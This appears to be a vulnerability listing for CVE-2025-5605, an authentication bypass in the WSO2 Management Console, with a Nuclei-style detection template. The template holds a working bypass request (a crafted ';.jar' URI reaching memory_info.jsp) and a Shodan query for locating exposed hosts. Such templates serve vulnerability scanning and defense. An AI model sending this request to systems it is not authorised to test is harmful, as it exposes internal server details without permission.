An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.
PoC代码[已公开]
id: CVE-2025-5605
info:
name: WSO2 Management Console - Authentication Bypass
author: DhiyaneshDK
severity: medium
description: |
An authentication bypass vulnerability exists in the Management Console of multiple WSO2 products. A malicious actor with access to the console can manipulate the request URI to bypass authentication and access certain restricted resources, resulting in partial information disclosure. The known exposure from this issue is limited to memory statistics. While the vulnerability does not allow full account compromise, it still enables unauthorized access to internal system details.
impact: |
Attackers can bypass authentication to access internal memory statistics, leading to partial information disclosure.
reference:
- https://blog.lexfo.fr/wso2.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-5605
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4115/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:1398055326
tags: cve,cve2025,wso2,auth-bypass
http:
- raw:
- |
GET /carbon/server-admin/memory_info.jsp;.jar HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- 'Memory Statistics'
- 'Collection Usage'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100a0d876cf7bf930abeeada3ce4399e109f84467bb94fd50d4249df5f99c879c3902207ec44cbaf90746443537f9fb9b2875b51b1e9eeed8495df3f1d09ad7ff337e4e:922c64590222798bb761d5b6d8e72950